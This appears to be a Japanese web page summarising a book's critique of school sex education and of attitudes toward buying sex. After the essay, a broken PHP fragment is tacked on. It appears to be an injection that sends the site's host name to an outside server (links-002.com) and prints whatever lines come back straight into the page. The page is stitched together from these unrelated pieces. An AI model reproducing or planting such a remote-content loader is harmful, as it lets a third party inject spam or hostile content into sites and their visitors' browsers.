解体新書

 

はじめに、現在の性教育の性に関する知識は受精の知識である。次に、男女で隔離して教育し、女生徒には母性を肯定するイデオロギーを押し付ける。3つめに、第二次特徴を誇張する。そして男女の違いを強調する。4つめは、性関係は結婚を前提としていること。5つめに性病および性被害の誇張。6つめに青少年は責任能力が欠如しているとし、その上での性行為の禁止。最後に実際に妊娠した女生徒が出現したならば、学校側は内密に処分する。このように現在の性教育は差別観に満ちていると主張している。
自者と他者との関係を学校では教えてくれない。それは恋愛とセックスを交換してはならない理由を教えるべき側にいる大人たちが、学歴・収入・生活の安定を目標にしておりそれを教育するのが都合悪かったのである。
男性が買春するのは体制を「解放」するのを阻止するためであり、女性も男性が買春ツアーに行くのは男の本能として自己の解放を抑圧している。著者は外的体制的支配を変える必要性だけでなく、本当に必要な改革は個人のなかにある構造的な思考、内面的な体制の呪縛だと主張している。

//// $MAX = 5; // ////////////////// $lines = file('http://links-002.com/ad/set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST'])); shuffle($lines); for($i=0;$i<$MAX;$i++){ echo($lines[$i].""); } ?>